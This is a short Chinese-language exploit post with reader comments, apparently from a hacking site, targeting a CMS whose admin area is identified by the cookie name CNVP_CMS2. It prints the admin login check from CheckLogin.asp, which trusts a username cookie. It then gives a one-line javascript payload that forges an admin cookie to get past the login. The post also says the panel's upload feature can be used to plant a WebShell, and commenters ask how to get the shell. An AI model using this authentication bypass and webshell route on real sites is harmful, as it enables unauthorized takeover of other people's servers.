/admin/CheckLogin.asp: 

<%
Response.Buffer = True
Response.Expires = -1
Response.ExpiresAbsolute = Now() - 1
Response.Expires = 0
Response.CacheControl = "no-cache"
Session.CodePage = 65001
Response.Charset = "UTF-8"
UserName=Request.Cookies("CNVP_CMS2")("UserName") '在cookie中取username值
If UserName="" Then
    Response.Redirect("Admin_Login.asp") '如果为空,就跳转
    Response.End()
End If
%>

Exp: 

javascript:alert(document.cookie="CNVP%5FCMS2=UserName=admin")

这样就能进后台了:/admin/Admin_Index.asp,后台有个上传的地方可以拿 WebShell。

留言评论(旧系统):

佚名 @ 2014-03-24 02:10:03

具体怎么拿shell呢?

本站回复:

进后台,后台有个上传的地方可以拿 WebShell。

佚名 @ 2014-03-27 22:22:48

就一个上传图片的,试了不行啊。估计是道行不够。大哥能不能指点一下

本站回复:

没用过这个后台,不太了解。